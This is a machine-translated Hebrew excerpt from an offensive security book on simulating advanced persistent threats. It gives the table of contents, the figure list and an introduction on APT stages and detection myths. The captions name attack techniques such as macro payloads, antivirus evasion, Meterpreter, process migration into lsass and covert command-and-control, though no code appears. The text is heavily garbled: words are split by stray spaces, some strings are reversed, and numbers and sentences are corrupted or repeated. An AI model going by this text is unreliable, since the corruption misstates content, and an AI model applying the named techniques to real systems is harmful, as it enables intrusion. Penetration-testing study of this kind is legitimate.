Advanced Penetration Testing Hacking The World's Most Secure Networks

Machine Translated by Google
‫‪Machine Translated by Google‬‬
‫תו כן העניינים‬
‫כי סוי‬
‫ׁ ַש עַ ר‬
‫מ בוא‬
‫מגיע מעג ל מ לא‬
‫איום מתמ שך מת קדם )‪(APT‬‬
‫ט כנו לוגיית הדור ה בא‬
‫"הא קרים"‬
‫ת ש כ ח מ כ ל מה שאתה חו ש ב שאתהיודע ע ל בדי קת חדירה‬

‫איך ה ספר הזה מאורגן‬
‫פר ק ‪ 1:‬ר שומות רפואיות ) לא‪-‬א ב ט חה(‪.‬‬
‫מ בוא ל סימו לציה ש ל איום מתמ שך מת קדם‬
‫ר קע ותדרוך מ שימה‬
‫מ ש לו ח מ טען ח ל ק ‪ 1:‬למד כיצד לה שתמ ש במא קרו ‪VBA‬‬
‫פי קוד ו ב קרה ח ל ק ‪1:‬י סודות ועי קריים‬
‫ההת קפה‬
‫סי כום‬
‫תרגי לים‬
‫פר ק ‪ 2:‬גני בת מ ח קר‬
‫א ספ קת מ טען ח ל ק ‪ 2:‬שימו ש ביי שומון ‪ Java‬ע בור מ ש לו ח מ טען‬
‫הערות ע ל התמדה במ טען‬
‫פי קוד ו ב קרה ח ל ק ‪2:‬ניהו ל הת קפות מת קדם‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 3:‬שוד ש ל המאה הע שרים וא חת‬
‫מה ע שוי לע בוד?‬
‫שום ד בר לא ב טו ח‬
‫פו לי טי קה ארגונית‬
‫מידו ל ‪ APT‬לעומת בדי קת חדירה מ סורתית‬
‫פי קוד ו ב קרה ח ל ק ש לי שי‪ :‬ערוצים ונתונים מת קדמים‬
‫ה סתננות‬
‫מ ש לו ח מ טען ח ל ק ‪ III:‬מדיה פיזית‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 4:‬פארמה קארמה‬
‫א ספ קת מ טען ח ל ק ‪IV:‬ניצו ל בצד ה ל קו ח ‪1‬‬
‫פי קוד ו ב קרה ח ל ק ‪IV:‬אינ טגרציה ש ל ‪Metasploit‬‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 5:‬רו בים ות חמו שת‬
‫מ סירת מ טען ח ל ק ‪V:‬הדמיית מת קפת כופר‬
‫פי קוד ו ב קרה ח ל ק ‪V:‬יצירת פתרון ‪ C2‬סמוי‬
‫א ס טר טגיות חד שות בהתגנ בות ופרי סה‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 6:‬מודיעין פ לי לי‬
‫א ספ קת מ טען ח ל ק ‪ VI:‬פרי סה עם ‪HTA‬‬
‫ה ס למה ש ל הר שאות ‪ -Microsoft Windows‬ב‬
‫פי קוד ו ב קרה ח ל ק ‪VI:‬תי בת ה קריפ‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 7:‬מ ש ח קי מ ל חמה‬

‫מ סירת מ טען ח ל ק ‪VII: USB Shotgun Attack‬‬
‫פי קוד ו ב קרה ח ל ק ‪VII:‬נתונים או טונומיים מת קדמים‬
‫ה סתננות‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪8: Hack Journalists‬‬
‫ִתדר ו ּך‬
‫מו שגים מת קדמים בהנד סה ח ברתית‬
‫‪ C2‬ח ל ק ‪ VIII:‬מו שגים ני סויים בפי קוד ו ב קרה‬
‫מ ש לו ח מ טען ח ל ק ‪VIII:‬תו כן אינ טרנ ט ע שיר מגוון‬
‫ההת קפה‬
‫סי כום‬
‫פר ק ‪ 9:‬ח שיפה צפונית‬
‫ס קירה כ ל לית‬
‫מער כות הפע לה‬

‫מר ח ב ‪IP‬צי בורי צפון קוריאני‬
‫מער כת ה ט לפון הצפון קוריאנית‬
‫מ כ שירים ניידים מאו שרים‬
‫"הגן המו קף חומה"‪ :‬האינ טראנ ט ש ל קוונגמיונג‬
‫האזנת אודיו ווידאו‬
‫סי כום‬
‫ה ס כם רי שיון מ שתמ ש קצה‬
‫ר שימת איורים‬
‫פר ק ‪ 1:‬ר שומות רפואיות ) לא‪-‬א ב ט חה(‪.‬‬
‫איור ‪1.1‬זרימת ר שת ‪Pharmattix‬איור‬

‫‪1.2‬תפ קידי מ שתמ ש‬
‫איור ‪ 1.3‬קוד ניצו ל ‪ VBA‬מיו בא לתוך ‪MS Word.‬‬
‫איור ‪ 1.4‬שמירה להו כ חה רא שונית ש ל אנ טי וירו ס‪.‬‬
‫איור ‪1.5‬זה מדגים שיעור פגיעה ‪ AV‬ג בוה באופן ב לתי מת ק ב ל ע ל הדעת‪.‬‬
‫איור ‪ 1.6‬מידע נו סף‪.‬‬
‫איור ‪1.7‬א כן מ טען חמ קני‪.‬‬
‫איור ‪ 1.8‬לא‪Qihoo-360 ,‬אינו הג ביע ה קדו ש ש ל ‪AV.‬‬
‫איור ‪ 1.9‬מ סמך רי ק הנו שא מ טען מא קרו‪.‬‬
‫איור ‪ 1.10‬קצתיותר מ ש כנע‪.‬‬
‫איור ‪1.11‬ת שתית ש לי טה ו ב קרה ב סי סית רא שונית‪.‬‬
‫איור ‪1.12‬ההת קף שהו ש לם עם גי שה מ לאה לר שומות הרפואיות‪.‬‬
‫פר ק ‪ 2:‬גני בת מ ח קר‬

‫איור ‪2.1‬אפ שר ל כ ל קוד ‪-Java‬ההמ קומי לפעו ל בדפדפן‪.‬‬
‫איור ‪2.2‬יי שומון ‪ Java‬פוע ל בדפדפן‪.‬‬
‫איור ‪2.3‬המ סגרת המ שודרגת מ טפ לת במ ספר מאר חים ומער כות הפע לה‪.‬‬
‫פר ק ‪ 3:‬שוד ש ל המאה הע שרים וא חת‬

‫איור ‪3.1‬היופי בהגדרה הזו הוא שאם ה‪ 2C-‬ש לך מופרע ע לידי פעו לות‬
‫א ב ט חה‪ ,‬אתהי כו ל ל כוון את ‪-DNS‬ה ש לך ל שרת א חר‪.‬‬
‫איור ‪ 3.2‬מערך ני טור פריצה ב סי סי‪.‬‬
‫איור ‪ 3.3‬ממממממ‪ .‬חֲ ׁ ָשאִי‪.‬‬
‫פר ק ‪ 4:‬פארמה קארמה‬
‫איור ‪4.1‬תמונה זו ‪-cvedetails‬מ מציגה ‪ 56‬פגיעויות ש ל ביצוע קוד ‪ -Flash‬ב‬
‫ב שנת ‪ 2016‬ב ל בד‪.‬‬
‫איור ‪4.2‬ה בעיה מ ספר א חת במ סך האזע קה הזה ש ל ‪AlienVault SOC‬היא‬

‫תו כנה פגיעה‪ ,‬כא שר התו כנה הזו היא ‪Flash.‬‬
‫איור ‪ 4.3‬ברור שזו ר שת גדו לה ש ח סרה או ברו ל מגו ב ש‬
‫א ס טר טגיית ניהו ל פגיעות‪.‬‬

‫איור ‪ 4.4‬פ ל ט ס קריפ ט מציג נתוני תו סף‪.‬‬
‫איור ‪4.5‬הזמנה ש ל ‪ LinkedIn‬מגיעה כהודעת דוא" ל ‪HTML.‬‬
‫איור ‪4.6‬זהו באג ש ל ביצוע פ קודות מר חו ק עם קוד ניצו ל אמין ב ט בע‪.‬‬
‫איור ‪ 4.7 Metasploit‬עו שה ע בודה מצוינת ב ל ט ש ט ש את הת קפת ‪2015-5012.‬‬

‫‪CVE‬‬
‫איור ‪ 4.8‬פונ קציית ‪ XOR‬פ שו טהי כו לה לה בי ס ב ק לות את ט כנו לוגיית האנ טי‪-‬וירו ס‪.‬‬
‫איור ‪4.9‬ההפע לה ש ל ‪ Meterpreter‬מוע ברת דרך ‪ SSH‬ונראית תמימה ל‪SDI-‬‬

‫בר שת‪.‬‬
‫איור ‪ 4.10‬פנ ק ס ר שימות אינוי כו ל ל כתו ב ל כונן ‪C.‬זה הימור הוגן לרו ב‬
‫תו כנות שו ל חן הע בודהי ש אותן הג ב לות‪.‬‬
‫איור ‪ 4.11 Armitage‬מציג ר שימה ש ל תו ספים וה בע לים ש להם‪.‬‬
‫איור ‪4.12‬הע ברת תה ליך היא תה ליך ב ל חיצה א חת‪ .‬כאן ע ברנו א ל‬
‫‪lsass.exe.‬‬
‫איור ‪ 4.13‬בדוגמה זו ‪ test.txt‬מוע לה מת חנת הע בודה ש ל התו קף‪.‬‬
‫איור ‪4.14‬ניצו ל פגיעות ‪ -ScriptHost‬ב כדי לה ס לים למער כת‪.‬‬
‫איור ‪4.15 Armitage‬הופך הר בה מ שימות מייגעות לעניין ב ל חיצה א חת‪.‬‬

‫איור ‪5.1‬תות חן רפאים מ בוזר בהגנה‪ .‬מ כונת ‪ CNC‬ב קוד פתו ח המיועדת לייצור‬
‫מ ק ל טי ‪AR-15‬ת חתונים המוג ב לים ע ל פי ה חו ק הפדר לי‪.‬‬
‫איור ‪-AT-4‬ה ‪5.2‬ה סו ביי טי )מימין( היה עות ק ש ל מער כת ‪MILAN‬הצרפתית‬

‫)מ שמא ל(‪.‬‬
‫איור ‪5.3‬זרימת תה ליך ההצפנה‪.‬‬
‫איור ‪5.4‬זרימת תה ליך פענו ח‪.‬‬
‫איור ‪ 5.5‬טופו לוגיה סמויה ‪ C2‬פ שו טה‪.‬‬
‫איור ‪ 5.6‬מ סך נ חיתה ש ל ‪Veil-Evasion.‬‬

‫איור ‪5.7‬צעיף עם ער כת אפ שרויות‪.‬‬
‫איור ‪5.8 Veil‬י כו ל כעת ליצור קו בץ הפע לה ש ל ‪ Python‬מהו ל מ קוד המע טפת‬
‫הגו למי‪.‬‬
‫איור ‪ 5.9‬קו בץ ההפע לה המהודר מו כן ל שימו ש‪.‬‬

‫איור ‪ 5.10‬שו ב‪ ,‬הוא מו כן ל שימו ש‪.‬‬
‫איור ‪5.11‬תי בת דו‪ -‬שי ח שמירה ב שם מציגה את סוגי ה ק בצים שאיתם ‪Solid Edge‬‬
‫עו בד‪.‬‬
‫איור ‪ 5.12‬ספרייתיי שומי ‪Solid Edge.‬‬

‫איור ‪5.13‬ה קור בן עדייןיצ טרך להפעי ל תו כן א ב ל זו בעיה ש ל הנד סה ח ברתית‪.‬‬
‫איור ‪ 5.14‬ס כימת מ ק ל ט ת חתון ב‪Solid Edge 3D. -‬‬

‫פר ק ‪ 6:‬מודיעין פ לי לי‬
‫איור ‪ 6.1‬לא ההודעה ה כי מזמינה‪.‬‬
‫איור ‪6.2‬יי שום ‪ HTML‬ב סי סי‪.‬‬
‫איור ‪6.3‬זה קצתיותר טו ב‪ ,‬א ב ל בוא נ ב חר מ שהו שמתאים להת קפה‪.‬‬
‫איור ‪6.4‬הדוגמה ה ב לתי נמנעת ש ל ‪VirusTotal.‬‬

‫איור ‪6.5‬תי בת דו‪ -‬שי ח ב קרת ח ש בון מ שתמ ש‪ .‬זהי כו ל להיראות איך שאתה‬
‫רוצה‪.‬‬
‫איור ‪6.6‬נתוני ‪-XLS‬ה מ כי לים שמות ע לונים‪ ,‬חומרה‪ ,‬ר כי ב ‪ KB‬ו כן ה לאה‪.‬‬
‫איור ‪6.7‬ת לות וו קר מציג נתי בי ‪ DLL‬מ לאים‪.‬‬

‫איור ‪-Raspberry Pi 3B‬ה ‪ 6.8‬במ לוא הדרו‪.‬‬
‫איור ‪ 6.9 Raspberry Pi‬עם כו בע ‪ )PoE‬חומרה הו ספה למע לה(‪.‬‬
‫איור ‪ 6.10‬ש ל ב רא שון‪ :‬הת ח בר עם ‪3G.‬‬
‫איור ‪ 6.11‬ש ל ב שני‪ :‬ב חר הת קן ‪USB.‬‬
‫איור ‪ 6.12‬ש ל ב ש לי שי‪ :‬נייד ‪HUAWEI.‬‬
‫איור ‪ 6.13‬ש ל ב ר ביעי‪ :‬ממ ש ק ‪#0.‬‬
‫איור ‪ 6.14‬ש ל ב חמי שי‪ :‬מנוי לע ס ק‪.‬‬

‫איור ‪ 6.15‬ש ל ב שי שי‪ :‬אתה מו כן ל ל כת‪.‬‬
‫איור ‪-KeyGrabber‬ה ‪6.16‬הוא דוגמה ‪ -keylogger‬ל בע לי כו לת ‪WiFi.‬‬
‫איור ‪6.17‬ניתן לזייף ב ק לות את זיהוי המת ק שר‪.‬‬
‫איור ‪6.18‬זיוף הודעות ‪ SMS‬באופן דומה‪.‬‬
‫איור ‪ 6.19‬שמור ע ל ד ברים א לה פ שו טים אך ה שתמ ש ב כ ל הת בניות שי ש לך‬
‫בהי שגיד‪.‬‬
‫פר ק ‪ 7:‬מ ש ח קי מ ל חמה‬

‫איור ‪ 7.1‬מר כז ת ק שורת מאו ב ט ח בארה" ב מדור‪.‬‬
‫איור ‪7.2‬אפי לו רא ש הצנצנת הירו ק ביותר לא הו לך ליפו ל ע ל זה‪.‬‬
‫איור ‪7.3‬זהיוצר את העי לה‪.‬‬
‫פר ק ‪8: Hack Journalists‬‬
‫איור ‪ 8.1‬מ שואה רא שונית מ סומנת כצומת מא ס טר‪.‬‬
‫איור ‪ 8.2 C2‬מ שתמ ש ב‪ retsaM-‬ע בור קי שוריותיוצאת‪.‬‬
‫איור ‪ 8.3‬פ ס ק זמן בצומת הרא שי מ סמן שהוא כ בר לא מתפ קד או שהמאר ח‬
‫כ בוי‪.‬‬
‫איור ‪ 8.4‬שרת ‪ C2‬מנה צומת מא ס טר חד ש‪.‬‬

‫איור ‪ 8.5‬סו כנים ממנים את המא ס טר ש להם‪.‬‬
‫איור ‪8.6‬המא ס טר מתפ קד כ שער לצמתים א חרים כמו קודם‪.‬‬
‫איור ‪ 8.7‬ב חירות נו ספות מת קיימות לפי הצורך‪.‬‬
‫איור ‪ 8.8‬קו בץ ‪SDKPluginEntrypoint.cpp.‬‬
‫איור ‪8.9‬תפרי ט בניית ‪Xcode.‬‬
‫איור ‪ 8.10‬מ טען הר ח בת סו כן ‪C2.‬‬
‫איור ‪8.11‬אריזה לפני טי סה ‪ -InDesign.‬ב‬
‫פר ק ‪ 9:‬ח שיפה צפונית‬
‫איור ‪ 9.1‬שו ל חן הע בודה ש ל כו כ ב אדום‪.‬‬
‫איור ‪ 9.2‬ק ב לת מע טפת‪.‬‬

‫איור ‪ 9.3‬פגז‪.‬‬
‫איור ‪ 9.4‬מהיריותר ו ק ליותר לע בוד באנג לית‪.‬‬

‫איור ‪ 9.5‬כו כ ב אדום לינו ק ס באנג לית‪.‬‬
‫איור ‪9.6‬הפע ל הגדרת שור ש‪.‬‬
‫איור ‪9.7‬הזן את האי שורים שיצרת ע בור המ שתמ ש ש לך‪.‬‬
‫איור ‪ 9.8‬כעתי ש לנו גי שת שור ש‪.‬‬
‫איור ‪9.9‬ה ש בת ב קרת גי שה לפי שי קו ל דעת‪.‬‬
‫איור ‪9.10‬ה ש בת תה לי כי ני טור‪.‬‬
‫איור ‪ 9.11‬מ סך הת קנת לינו ק ס ש ל כו כ ב אדום‪.‬‬
‫איור ‪ 9.12‬ב חר במנה ל שו ל חן הע בודה‪.‬‬
‫איור ‪ 9.13‬שו ב‪ ,‬עדיף לע בוד באנג לית‪.‬‬
‫איור ‪ 9.14‬פרו ק סי לא מאו ב ט ח ש ל דיונון‪.‬‬
‫איור ‪ 9.15‬ממ ש ק ‪Webmin.‬‬
‫איור ‪ 9.16‬פ ל ט ‪Toneloc.‬‬
‫איור ‪9.17‬תצורת ‪WarVOX.‬‬
‫איור ‪9.18‬הו סף מ טרות ‪ -WarVOX.‬ל‬
‫איור ‪9.19‬או לד ס קו ל!‬
‫איור ‪ 9.20‬מידע ע ל מ כ שיר טא ב ל ט ‪Yecon.‬‬
‫ר שימת שו ל חנות‬
‫ט ב לה ‪ 5.1‬ספריית ‪ libgcrypt‬מ כי לה את כ ל פונ קציות ההצפנה שתצ טרך אי‬
‫פעם‪.‬‬
‫בדי קת חדירה מת קדמת‬

‫פריצה לר שתות המאו ב ט חות בעו לם‬
‫ווי ל א ל סופ‬
‫מ בוא‬
‫י שנה אמונהי שנה אך שגויה שההון מעדיף את האמיצים‪ .‬מז לי ש ותמידיעדיף את‬
‫המו כנים‪ .‬כא שר הארגון ש לך חווה אירוע א ב ט חה רציני )והואי קרה(‪ ,‬זו רמת המו כנות‬
‫ש לך ע ל סמך הה בנה ש ל ה ב לתי נמנע ש ל אירוע כזה שתנ חה את ההתאו ש שות‬
‫המוצ ל חת‪ .‬זה לא מ שנה אם אתה א חראי לא ב ט חה ש ל מ כ ל לה קהי לתית מ קומית או‬
‫אם אתה ‪-CISO‬ה ש ל בנ ק בינ לאומי ‪ -‬עו בדה זו תמיד תי שאר נ כונה‪.‬‬
‫אם לצ ט ט את הווארד ראף‪ " ,‬לאירד ג שם כ שנ ח בנה את התי בה‪".‬‬

‫הצעד הרא שון להת כונן הוא להיות מודע‪.‬‬
‫מגיע מעג ל מ לא‬

‫תמיד היה הרו שם שאתה צריך לת קן את המער כות ש לך ו לא ב ט ח את הר שתות ש לך‬
‫מ כיוון שהא קרים סור קים טוו חי כתו בות עצומים ומ חפ שים קור בנות ש לא ע שו את‬
‫הד ברים הא לה והםי ק חו את כ ל המער כות הפגיעות שהםי כו לים לה שיג‪ .‬במו בן מ סוים‬
‫זה נ כון ‪-‬תמיד היו מי שה סתפ קו בפירות נמוך‪ .‬זה היה נ כון גם ב שנות ה‪ - 08-‬חיוג‬
‫מ ל חמה ‪ -PSTN‬ב והת קפות כא לה הן בדרך כ ל ל טריוויא ליות להי שמר מפניהן אם‬
‫אתהיודע מו ל מה אתה מתמודד‪ .‬עם זאת‪ ,‬אם אתה ממו קד במיו חד ע לידי מי שהו עם‬
‫זמן ומ שא בים‪,‬י ש לך בעיה ב סדר גוד ל שונה לגמרי‪ .‬במי לים פ שו טות‪ ,‬ה שגת גי שה‬
‫למער כות ארגוניות ע לידי מי קוד ס ב לני למ שתמ שים הייתה בדרך כ ל ל הדרך ה טו בה‬
‫ביותר ל ל כת ב שנות ה‪ ,08-‬ו בדרך כ ל ל זו הדרך ה טו בה ביותר כעת‪ .‬עם זאת‪ ,‬תע שיית‬
‫הא ב ט חה‪ ,‬כמו כ ל תע שיית א חרת‪ ,‬מ חפ שת כ ל הזמן למ כור מוצרים ו שירותים‬
‫" חד שים" ב שמות שונים ו כדי לע שות זאת‪ ,‬נדר שת מי לת באזז‪ .‬זה שנת קע היה איום‬
‫מתמ שך מת קדם‪.‬‬
‫איום מתמ שך מת קדם )‪(APT‬‬

‫מה שמ בדי ל בין ‪ APT‬ל חדירה מ סורתיתיותר הוא שהוא מאוד ממו קד מ טרה‪ .‬התו קף‬
‫מ חפ ש מ שהו )נתונים קנייניים למ ש ל( ומו כן להיות ס ב לני כ כ ל הדרו ש כדי לר כו ש אותו‪.‬‬
‫למרות שאני לא ממ ליץ לפר ק תה לי כים מור כ בים לר שימות פ שו טות או תר שימי זרימה‪,‬‬
‫ל כ ל ה‪sTPA-‬י ש בדרך כ ל ל את המאפיינים ה באים‪:‬‬
‫פ שרה רא שונית ‪ -‬בדרך כ ל ל מ בוצעת או נעזרת ב שימו ש ב ט כני קות הנד סה‬
‫ח ברתית‪ .‬הת קפה נגד ל קו ח ת כ לו ל ר כי ב ט כני לי בה ) כגוןיי שומון ג'אווה(‪ ,‬אך ל לא‬
‫עי לה מ ש כנעת‪ ,‬מת קפה כזו בדרך כ ל ל נידונה ל כי ש לון‪ .‬עי להי כו לה להיות ה כ ל‬
‫א ב ל היא מוצ ל חת כ שהיא מותאמת למ טרה ו לעו בדיה‪.‬‬
‫ה ש ל כת ר שת ר ח בה כדי לתפו ס את הפירות הת לויים הנמו כים ) כדי לער ב ב את‬

‫המ טאפורות ש לי( היא לא דרך מ קו ב לת לדגמן ‪ APTs‬וזו בה ח ל ט לא איך הירי בים‬
‫ש לך עו שים ד ברים‪.‬‬
‫צור רא ש חוף ‪-‬ה ב ט ח גי שה עתידית לנ כ סים שנפגעו מ ב לי להזד ק ק לפריצה‬
‫רא שונית חוזרת‪ .‬זה המ קום ש בו )‪Command & Control (C2‬נ כנ ס ל ש ח ק ועדיף‬
‫שיהיה מ שהו שיצרת בעצמך; שאתה מ בין הי ט ב וי כו ל להתאים אי שית לפי הצר כים‬
‫ש לך‪ .‬זו נ קודת מפת ח ב ספר הזה שאני מע לה מ ספר פעמים כ שאני מד בר ע ל‬
‫ההי ב טים ה שונים ש ל ‪C2 -‬היא צרי כה להיות מאו ב ט חת א ב ל התע בורה ש לה צרי כה‬
‫להיראות לגי טימית‪.‬י ש פתרונות ק לים ל בעיה זו‪.‬‬
‫הר ח בת הר שאות ‪-‬ה שג גי שה מ קומית ו ב סופו ש ל ד בר למנה ל דומיין‪.‬‬

‫י שנן דר כים ר בות שניתן לה שיג זאת; ספר זהי קדי ש מ קום ר ב ל שי טות ה טו בות‬
‫והאמינות ביותר‪ ,‬כמו גם ל כמה מו שגים עדיניםיותר‪.‬‬
‫סיור פנימי ‪-‬א סוף מידע ע ל ת שתית מ ס בי ב‪,‬י ח סי אמון ומ בנה הת חום ש ל‬
‫‪ Windows.‬מודעות למצ ב היא קרי טית להצ ל חת כ ל ‪APT.‬‬
‫קו לוניזציה ש ל ר שת ‪-‬הר ח ב את ה ש לי טה לנ כ סי ר שת א חרים באמצעות אי שורי‬

‫ניהו ל שנא ספו או הת קפות א חרות‪ .‬זה מ כונה גם תנועה צידית‪ ,‬ש בה תו קף ) שה קים‬
‫ב סי סיצי ב ש ל פעו לות בר שת היעד(יפיץ ה שפעה ע ל פני הת שתית וינצ ל מאר חים‬
‫א חרים‪.‬‬
‫מתמיד ‪-‬ה ב ט ח המ שך ש לי טה באמצעות ‪Command & Control.‬התמדה‬

‫פירו שה בעצם הי כו לת לג שת א ל היעד ש לך מתי שתרצה‪ ,‬ל לא ק שר ל שא לה אם‬
‫המ כונה מופע לת מ חד ש‪.‬‬
‫ה ש לם מ שימה ‪-‬הוצאת נתונים גנו בים‪ .‬ה ח ל ק ה ח שו ב ביותר ב כ ל ‪APT.‬התו קף‬
‫אינו מעוניין בה ש חתת מער כות‪ ,‬ה ש חתת דפי אינ טרנ ט או גני בת מ ספרי כר טי סי‬
‫א שראי )א לא אם כ ל א חד מהד ברים ה ל לו מ קדם את המ טרה ה סופית(‪ .‬תמידי ש‬
‫מ טרה מוגדרת הי ט ב ברא ש והמ טרה הזו היא כמע ט תמיד נתונים קנייניים ‪-‬‬
‫המ שימה הו ש למה כא שר הנתונים ה ל לו אותרו ו שו חררו‪.‬‬
‫אני בוד ק חדירה במ קצועי )"הא קר" מ קצועי‪ ,‬אם תרצה( עו בד‬
‫אני בוד ק חדירה במ קצועי )"הא קר" מ קצועי‪ ,‬אם תרצה( שעו בד ע בור כ ל סוג אפ שרי‬
‫ש ל ל קו ח ו שו ק אנ כי לאורך ה ח ל ק ה טו ב ביותר ש ל שני ע שורים‪ .‬ה ספר הזה מד בר מתוך‬
‫הנר טי ב הזה‪ .‬אני רוצה להראות עד כמה בדי קות חדירה קונ בנציונ ליות כמע ט ח סרות‬
‫תוע לת כא שר מנ סים להגן ע ל ארגונים מפני הת קפת ‪ APT‬ממו קדת‪ .‬ר ק ע לידי מע בר‬
‫לאופי ה ס טגנציה ש ל מתודו לוגיות בדי קת חדירה ע כ שוויות ניתן לה שיג ת קווה זו‪.‬‬
‫ירי בים פו טנציא ליים כיום כו ל לים פ שע מאורגן ומדינות לאום ‪ -‬ראוי לציין ש סו כנויות ביון‬
‫זרות )מ כ ל מדינה( מו ש קעות ר בות בריגו ל תע שייתי‪ ,‬ו לא ר ק נגד מדינות עוינות‪.‬‬
‫ט כנו לוגיית הדור ה בא‬

‫י שנן ט כנו לוגיות ר בות זמינות המתיימרות להיות מ סוג לות למנוע ‪APTs,‬המ סוג לות‬
‫ל ח סום תו כנות זדוניות לאידועות‪ .‬ח ל ק מהמוצרים ה ל לו אינם רעים וא כן מו סיפים‬
‫ש כ בה נו ספת ש ל א ב ט חה ע לידי מתן מידה מ סוימת ש ל ניתו ח התנהגותי ‪ -‬למ ש ל‬
‫ק לי טת הת ק שרות חוזרת ש ל ‪ Metasploit‬ע לידי ה סת כ לות ע ל מה שה‪ exe.-‬עו שה‬
‫במ קום לה סתמך ע ל חתימת אנ טי‪-‬וירו ס‪ ,‬שי כו לה להיות ב ק לות עו קף‪ .‬עם זאת‪ ,‬זה‬
‫טריוויא לי למוד ל פ שו ט כי ההתנהגות ש ל כ לי ע בודה כזה מו בנת הי ט ב‪APT .‬אמיתי‬
‫ית בצע ע לידי גורמי איומים מיומנים המ סוג לים לפת ח כ לים מ ש להם עם ה בנה חז קה‬
‫מאוד ש ל האופן ש בו פוע לות מער כות מודרניות לזיהוי ומניעת חדירות‪ .‬לפי כך‪ ,‬בתיאור‬
‫ט כני קות דוגמנות‪ ,‬אני עו שה שימו ש ר ב בפרו טו קו ל ‪ SSH‬כיוון שהוא פותר הר בה בעיות‬
‫תוך מי סוך פעי לות ממער כות ני טור ו במ ק בי ל נותן מראה ש ל תע בורה לגי טימית‪ .‬זה‬
‫ח כם ב ש ל ב זה ל ח שו ב ע ל מה ‪APT‬אינו ומדוע‪ .‬ראיתי מ ספר ארגונים‪ ,‬מ ס חריים וא חרים‪,‬‬
‫נותניםייעוץ ומו כרים שירותים ע ל סמך הה בנה הפגומה ש להם לג בי מהות האיום‬
‫המתמ שך המת קדם‪ .‬המאמר ה בא שפור סם ‪ -InfoWorld‬בהוא מ קום טו ב כמו כ ל‬
‫מ קום להפריך כמה מיתו סים שראיתי בדיון מ קוון לא חרונה‪:‬‬
‫סימן ‪ APT‬מ ס' ‪ 1:‬ע לייה ב כני סות מוג ברות ב שעת לי לה מאו חרת ‪-‬זו ש טות‪ .‬ברגע‬
‫שהיעד נפרץ ) ב כ ל אמצעי שהוא(‪ ,‬לתו קף אין צורך לע שות שימו ש ב שי טות‬
‫הת ח ברות מ בו קרות‪ ,‬מ כיוון שהםיפר סו ת שתית פי קוד ו ב קרה מ ש להם‪ .‬לא תראה‬
‫כני סות מוג ברות ב שעת לי לה מאו חרת או ב כ ל זמן א חר‪.‬‬
‫יומני בי קורת כ כ ל הנראה לאיפגעו ב שום ד בר כא שר תו קף מיומן בי ס ס את‬

‫רא ש ה חוף ש לו‪ .‬ס ביר להני ח שמנגנונים א לויע קפו מיד ע לידי התו קף‪.‬‬
‫סימן ‪ APT‬מ ס' ‪ 2:‬מציאת סו סים טרויאניים בד לת א חורית נפוצה ‪ -‬לאורך ה ספר‬
‫הזה אני א בדו ק בך כ ל הזמן עד כמה כ לי זיהוי ‪ AV‬ו כ לי תו כנה זדוניות א חרים אינם‬
‫יעי לים למ ל חמה ב‪ .sTPA-‬ה‪ "A"-‬מייצג מת קדם; התו קפיםיותר ממ סוג לים לפת ח‬
‫כ לים מ ש להם או לה סוות את ה כ לים הזמינים לצי בור‪ .‬אם אתה מוצא סו סים‬
‫טרויאניים בד לת א חורית )נפוצה או א חרת( והם הו כנ סו ל שם ע לידי ש ח קן חיצוני‬
‫מת קדם‪ ,‬הם פתי לים והייתם אמורים למצוא אותם‪.‬‬
‫סימן ‪ APT‬מ ס' ‪3:‬זורם מידע ב לתי צפוי ‪"-‬ה לוואי ש ל כ ל ל קו ח דוא" ל הייתה את‬
‫הי כו לת להראות הי כן המ שתמ ש הא חרון נ כנ ס כדי לא סוף דוא" ל והי כן ניג שו‬
‫להודעה הא חרונה‪ Gmail .‬ו כמה מער כות דוא" ל א חרות בענן כ בר מציעות זאת‪".‬‬
‫כ ל מער כת דואר א ל ק טרוני )או כ ל מער כת א חרת לצורך העניין(י כו לה לה ק לי ט‬

‫כתו בות ‪ IP‬מרו ח קות ו ל בצע ניתו ח בזמן אמת כדי לזהות התנהגות חריגה‪.‬‬
‫עם זאת‪ ,‬אם תו קף נמצא בר שת ש לך ו בו חר לג שת לדואר הא ל ק טרוני ש ל‬
‫המ שתמ שים ש לך באופן זה‪ ,‬כתו בת המ קורי כו לה ותגיע לר שת ש לך‪ .‬זה המ קרה‬
‫במיו חד כא שר הת קפות אדם בדפדפן הופ כות נפוצותיותר‪.‬‬
‫סימן ‪ APT‬מ ס' ‪4:‬גי לוי ח בי לות נתונים ב לתי צפויות ‪ -‬בת קווה שאו לי תת ק ל ב טעות‬
‫ב קו בצי ‪zip‬המ כי לים נתוניםי קרי ערך ) שנ שארו לך בנו חות למצוא אותם( היא דרך‬
‫גרועה לג שת לא ב ט חת מידע‪ .‬למרות שממצא כזה ע שוי בה ח ל ט להיות אינדי ק טור‬
‫לפ שרה ‪(IoC),‬הוא לא אמין ו לא ניתן ל חזור ע ליו‪ .‬אתה צריך להני ח שאם תו קף‬
‫מצ לי ח להי כנ ס לר שת ש לך ו לגנו ב את הנתונים הי קרים ביותר ש לך‪ ,‬הואיודע איך‬
‫לה שתמ ש בפ קודה ‪Delete.‬‬
‫סימן ‪ APT‬מ ס' ‪5:‬זיהוי כ לי פריצה מע בירים את ‪-hash -‬האני לא ב טו ח מדוע כ לי‬
‫פריצה " לע בור את "‪-hash‬הנ ב חרו לת שומת ל ב מיו חדת ‪ -‬במיו חד מ כיוון שהם‬
‫) בדרך כ ל ל( אינם נו טים להת קיים ב בידוד‪ ,‬א לא כ ח ל ק ממ סגרות פריצה‪ .‬אף ע ל פי‬
‫כן‪ ,‬בעוד שהנו כ חות ש ל כ ל כ לי כזהי כו לה להי ח ש ב ‪ -IoC,‬כת למדו ב ספר זה‬
‫שה שארת תו כנת פריצה ניתנת לזיהוי שו כ בת במ כונות שנפגעו היא פ שו ט לא הדרך‬
‫ש בה זה נע שה‪ .‬התגנ בות ו ס ב לנות הם סימני ההי כר ש ל ‪APT.‬‬
‫"הא קרים"‬
‫הדמוגרפיה ש ל מה שאנו מ ח שי בים כ"הא קרים" ה שתנתה ל לא כ ל ה כר ו ל כן‬
‫הה קדמה הזו תהיה הפעם הא חרונה ש בה אני מ שתמ ש במי לה הזו‪ .‬הוא מיו שן‬
‫ומיו שן וה קונו טציות שהוא מע לה הן ל ח לו טין‬
‫מיו שן ומיו שן וה קונו טציות שהוא מע לה לא מדוי קות ל ח לו טין‪ .‬אני מעדיף את המונ חים‬
